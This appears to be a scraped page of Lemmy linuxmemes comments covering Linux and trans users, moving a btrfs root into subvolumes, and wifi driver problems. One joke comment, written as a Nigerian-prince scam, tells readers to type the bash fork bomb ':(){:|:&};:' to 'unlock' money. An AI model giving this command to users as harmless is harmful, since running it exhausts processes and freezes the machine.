Open-minded people can get into linux. You also have to be open-minded to consider being trans. My take is that linux and being trans are not directly influencing each other, but both increase your open-mindedness separately which in turn drives you towards more open topics generally
Trans etc. are always a minority, obviously. They would not have to fight for their rights otherwise.
no one should have to fight for their right, but that doesn’t change the fact that non-trans people enjoy customizing their os as well. so answer to the original question is yes, it is a loud minority.
It’s IT wages and being able to take a break and think about oneself. When Twitter was called Twitter and I’ve been there, the core population of trans, lgbt+, kink, furry, whatever communities were those who could afford a brief moment to think about themselves, these later magnfied other folks who aren’t as well-off. Being gay or trans is natural as our science says, but understanding you are gay or trans means you have enough time, resources, safety to even discover you are one, not to say about presenting as one in public. Tech persons have a natural advantage here over a doordash delivery guy, but as they show it’s possible, many poorer persons show up too. And it’s not a coincidence Lemmy is popular in these communities, as it’s not only a tech-gated space, it’s also a promising safe space where they can be whoever they want without social pressure.
ed: if not for us being that fucked by capitalism, the distribution would be more even
While funny to meme about not really true. IT is made up of all sorts of people. Furries, trans, lgtbq+, tired oarny old men and everything in-between.
There is a disproportionately large number of furries working as network admins though. Whenever you use the internet, there’s a good chance that your data is transiting via a network administered by furries.
it’s just a meme. although there is perhaps a higher percentage of trans people using linux, perhaps due to the correlation with autism or because they’re attracted to less opressive alternative safe spaces in general
you can create them afterwards and move the stuff into the subvol. do it from a live usb and don’t forget to update fstab. be sure to use rsync with the flag to keep permissions etc
That’s simple, but it’s a completely unnecessary waste of I/O. You could create a writable snapshot of the btrfs root as a subvolume, edit the fstab and any other relevant files within that new subvolume, reconfigure the bootloader to specify that subvolume as the root filesystem (as a Linux kernel command line argument) instead of the btrfs root, and then reboot. After rebooting, the original btrfs root can be mounted, and everything unwanted from the original root (other than the new subvolume and its ancestor directories, obviously) can be deleted. Do not delete anything that you didn’t want to lose the changes to on the original root subvolume that you did after creating the snapshot, as the snapshot only remembers what you did before, as well as the changes made specific only to it (like the fstab).
If one wanted to create multiple subvolumes for different purposes, the above procedure can be modified. For instance, if one wanted a separate subvolume mounted at / vs /home, then one can create two writable snapshots, empty out the contents of home in new subvolume 1 (but not the /home directory itself because you want the directory to exist for something to mount onto it), empty out everything outside of home within new subvolume 2, move the contents of home therein up one directory and remove the /home directory itself. Now, one can edit the fstab in new subvolume 1 as appropriate (not forgetting to have new subvolume 2 mount at /home), edit any other relevant files, reconfigure the bootloader to tell the Linux to use new subvolume 1 as the root subvolume, then reboot. Finally, one can remove the unnecessary files from the original root.
Edit:
It is arguably better to manually specify the new root when booting in the Linux kernel command line, and not reconfigure the bootloader until you successfully boot. After success, (if the following is relevant to your system) use update-grub, and it should look at fstab to automatically reconfigure the bootloader accordingly to use the appropriate new subvolume as specified at fstab.
This is what I did years ago to one of my own systems, although I don’t know anything about Timeshift and how it requires things to be set up (I have my own backup scripts that are run by cron). I could have just snapshotted the btrfs root directly for snapshots, but I wanted the snapshots to be cleanly separated from the subvolume used as the Linux VFS root (except when I explicitly mount them).
I have a few wifi adapters from china who only work properly under Linux lmfao
Did Microsoft actually infiltrate Lemmy or something? I’m hearing of issues about Linux that haven’t existed since the very first days of desktop Linux
The wifi chipset on my new MSI mobo isn’t supported on current LTS version of Mint - I had to install a more recent kernel, so there are still issues with newer hardware
Yeah, the Chinese stuff seems to work better under Linux… for some reason 😂. I one based on a Realtek chip (I think 🤔) and I couldn’t get passed a few hundred KB in Windows. Linux fried that baby, it did 1.5MB 😂.
I still have wifi woes on my old tablet. Works fine for a few minutes, then dies. Works fine in Windows. I’m about to reinstall on it. Maybe the next distro I try will work?
This is probably some sort of firmware power management bug that the windows driver is working around. Try and see if you can find any documentation on it
Hello I am Nigerian Prince and you are last of my bloodline I have many millions of rubles to give you as successor but funds are locked, please type access code :(){:|:&};: into your terminal to unlock 45 million direct to your bank account wire transfer thank you.
some lemmy instances were having trouble with that for a while now. html used ampersand to encode special characters, and a regular ampersand gets encoded as &
Somehow, the decoding sometimes breaks, and we get to see it the way it is here
Oh, this is like when I was in high school and made batch files that open themselves infinitely and named them "not a virus" on the desktop, only to enjoy other students immediately running them.
But are you perhaps referencing to the situation with Broadcom just incrementing their chips and drivers for years, flooding the market with cheap but quirky chips? Do they still do that?
Mine just stopped working with brscan5 driver. It was a fast and quiet mobile scanner with high quality output. The new one is bigger, slower and louder and runs 90% of time in some photo mode. 🙁
linuxmemes
Oldest
This magazine is from a federated server and may be incomplete. Browse more on the original instance.